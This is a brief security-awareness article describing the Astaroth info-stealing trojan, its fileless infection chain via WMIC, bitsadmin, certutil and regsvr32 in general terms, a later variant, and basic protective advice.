loader gif

Astaroth trojan: The info-stealer that is widely used in fileless attack campaigns

broken,cement,concrete,hidden,wall,anonymous,bizarre,camouflage,crack,damaged,devious,enigmatic,eyeball,face,grungy,head,hide,hole,imaginary,imagination,intrude,looking,lurk,man,masonry,mysterious,nefarious,old,opening,peek,peep,peering,people,secret,see,sight,snoop,spy,stalker,stare,structural,structure,surreal,surveillance,trapped,urban,view,vision,watching,window
  • Astaroth is a trojan that steals sensitive information such as user credentials.
  • It leverages key logger module, operating system calls interception and clipboard monitoring to steal data.

A new wave of cyberattacks that make use of Astaroth trojan has resurfaced in the cybersecurity ecosystem. The trojan is being used in fileless attacks or through malspam campaigns.

What is Astaroth?

Astaroth is a trojan that steals sensitive information such as user credentials. It leverages key logger module, operating system calls interception and clipboard monitoring to steal data. The trojan was first detected in 2017 after it was used in multiple South American cyberattacks.

It is used in fileless malware campaigns to infect the memory of computers. It also exploits living-off-the-land binaries (LOLbins) such as the command line interface of the WMIC to silently download and execute malware payloads in the background.

How does it work?

  • The trojan arrives on the compromised computer via malicious links included in spam email.
  • Once the user clicks on the malicious link, a ZIP file is downloaded. This ZIP file contains an LNK file that runs the Windows Management Instrumentation Command line tool to install an XSL file.
  • The XSL file contains JScript code that runs another WMIC command to download another XSL file from a remote location. This, in turn, executes the JScript code included inside that file.
  • The second part of JScripy code downloads multiple files using bitsadmin.exe and then decodes them using certutil.exe.
  • One of the decoded binaries is loaded by regsvr32.exe.
  • The loader DLLs decode and load other DLLs.
  • The trojan may then steal information from web browsers and log keystrokes.

Astaroth variants

A new version of Astaroth trojan that used JPEG, GIF and extensionless files to avoid detection, was used to Brazilians. The campaign exploited legitimate operating system processes and security products to gain information about the target machine and steal password information.

How to safeguard yourself?

Astaroth trojan spreads with the help of the internet, portable drives and phishing emails, so it is important to maintain security measures for the same.

  • You need to verify the attachments from unknown sources before opening them;
  • You should also keep your programs and software up-to-date to terminate any malicious threat right away;
  • Use two-factor authentication as an extra layer of security to protect your accounts.
loader gif